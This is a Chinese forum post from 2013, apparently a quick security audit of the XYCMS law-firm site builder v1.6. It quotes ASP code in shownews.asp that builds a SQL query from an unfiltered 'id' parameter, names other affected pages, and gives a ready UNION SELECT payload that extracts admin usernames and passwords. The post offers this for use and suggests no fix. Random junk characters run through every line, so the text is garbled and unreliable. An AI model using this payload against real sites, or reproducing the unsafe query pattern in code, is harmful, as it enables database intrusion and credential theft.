前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似, T( ?8 e) n4 a2 T. F
4 m9 P/ n& ]5 E淫荡分割线% a; x% g2 r2 z- u# c) l. ^
--------------------------------------------------------4 F1 {$ q0 p7 Z7 g0 J/ y
6 P3 {6 V* S' ], `6 j k审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
5 q5 c" O \ E6 e) @& ~9 o源码地址:http://down.chinaz.com/soft/29233.htm, J5 R# p5 o3 t6 d) O& \/ ]
" p/ F; Y4 [, @% A4 w) y
漏洞文件:shownews.asp e' Z: t% O) Z6 ?1 a$ }- L
漏洞代码:7-13行0 K7 l0 h- ?- f7 Z( }
; W! {/ Y& T" w! U/ O. i2 b* [
- m9 N* Z q Y( r7 f<%
/ ^4 M( j, m# @% N- X5 j' u$ uid=request.QueryString("id")2 P' k& b! r3 K; U d
; r Y) X/ W1 F9 Xset snews=server.createobject("adodb.recordset")
& n& a# \! b" M0 {/ Wexec="select * from [news] where id="&id
: T4 |4 L4 [# k9 F5 jsnews.open exec,conn,1,1, s2 p- F. f) N% F: I) }3 h
%>
1 y) C" I# v1 y4 C( y6 m: n 2 r b, r f9 K" S, N
5 `& p, ]6 L3 f8 \7 K, j, ]什么过滤都没有 直造成注入# g0 W' I8 w+ ]" E
& { h) P! z: u4 C* ?注入点:http://127.0.0.1:99/shownews.asp?id=xx
) K5 R) T) }# ?) d5 y ( f- d* b! `; v* y% o
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找9 S' B2 k) [2 t2 K4 C
9 \& K/ z6 w! v: _4 R
# a& z" v! C$ X& Uexp: union select 1,admin,password,4,5,7 from admin_user$ ?0 `. K% S9 z
* c* I2 c9 l9 s/ Q' C1 O |
发表于 2013-4-4 17:28:12
收藏
支持
反对